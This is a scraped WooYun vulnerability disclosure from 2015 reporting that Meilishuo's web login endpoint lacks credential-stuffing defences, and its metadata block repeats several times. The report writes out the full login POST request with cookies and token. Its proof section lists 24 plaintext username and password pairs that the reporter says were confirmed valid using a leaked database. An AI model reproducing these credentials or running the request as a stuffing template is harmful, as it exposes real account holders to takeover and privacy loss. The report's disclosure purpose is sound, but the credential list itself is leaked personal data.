美丽说某接口撞库泄露用户登录凭据之二(有批量账号证明)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108393

漏洞标题：美丽说某接口撞库泄露用户登录凭据之二(有批量账号证明)

漏洞作者：路人甲

提交时间：2015-04-16 16:47

修复时间：2015-04-17 12:05

公开时间：2015-04-17 12:05

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-16：细节已通知厂商并且等待厂商处理中
2015-04-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

撞库扫号攻击已经是Top 10 Security Risks for 2014之一，不管你的网站密码保护的多好，但是面对已经泄露的账号密码，撞库扫号防御还是一个相当重要的环节。

详细说明：

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号
接口为：跟手机不是一个url，返回信息也不一样

POST /aw/user/logon HTTP/1.1
Host: account.meilishuo.com
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://account.meilishuo.com
nt: 1yQyN1tU7ssTVQ5GeZ16wy7Aj165xUWpvaGWb6w6ZevUNGTDNaG2VzrPx7khJam8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://account.meilishuo.com/user/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: SEASHELL=tzy9NVUvZnhO3/K8B2csAg==; pgv_pvi=8877613056; pgv_si=s7500620800; Hm_lvt_91f81dadcff336ae93c874de253c61ff=1429170864; Hm_lpvt_91f81dadcff336ae93c874de253c61ff=1429170864; MEILISHUO_GLOBAL_KEY=6fb549442ae384017120515083458319; numInCart=0; home_up_num=0; MEILISHUO_REFER=default; CHANNEL_FROM=0; santorini_mm=3c98a76036f4609c792c5e04d51bd69f; Hm_lvt_dde72e241ea4e39b97eca9a01eea2dda=1429169789; Hm_lpvt_dde72e241ea4e39b97eca9a01eea2dda=1429171980; LOGON_FROM=http%3A%2F%2Fwww.meilishuo.com%2Fwelcome
RA-Ver: 2.9.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
login_name=nilanlan&password=nilanlan&save_state=1&checkcode=&nt=1yQyN1tU7ssTVQ5GeZ16wy7Aj165xUWpvaGWb6w6ZevUNGTDNaG2VzrPx7khJam8

漏洞证明：

经过测试发现，使用某泄露数据库可以碰撞获得大量有效的登录账号.目前互联网上公开的账号都有数亿的规模，真要被利用的话危害还是很大的。

zy4334833	zyzy4833
carolinemomo	19890619
qqlwz	lwz6967760
audan	11.25audan
Cinderellazhan	kittyzhan
yufei4712353	89065328
xiaoxue1989	wujingxue
woaiwangdi	woaiwangdi
janery655	janery04023030
chenfeioa	020220oa
cynthiaxk	1985121112
xyz890717	xyz665272xyz
baojiong	bao12345
nilanlan	nilanlan
aken0820	42142130999
likefunv	g19881226q
yaya1202	liuyaya1202
cxtalent	chenxin8758
lynnxwt	19871218
vdgame	wxq123
tanya007	wenyi775
baixiaoba	shmily44
dongwei48135267	48135267
zm7610	mickey99

修复方案：

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-04-17 12:05

厂商回复：

漏洞信息不准确

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108393

漏洞标题：美丽说某接口撞库泄露用户登录凭据之二(有批量账号证明)

相关厂商：美丽说

漏洞作者：路人甲

提交时间：2015-04-16 16:47

修复时间：2015-04-17 12:05

公开时间：2015-04-17 12:05

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0108393

漏洞标题：美丽说某接口撞库泄露用户登录凭据之二(有批量账号证明)

相关厂商：美丽说

漏洞作者： 路人甲

提交时间：2015-04-16 16:47

修复时间：2015-04-17 12:05

公开时间：2015-04-17 12:05

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0108393"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云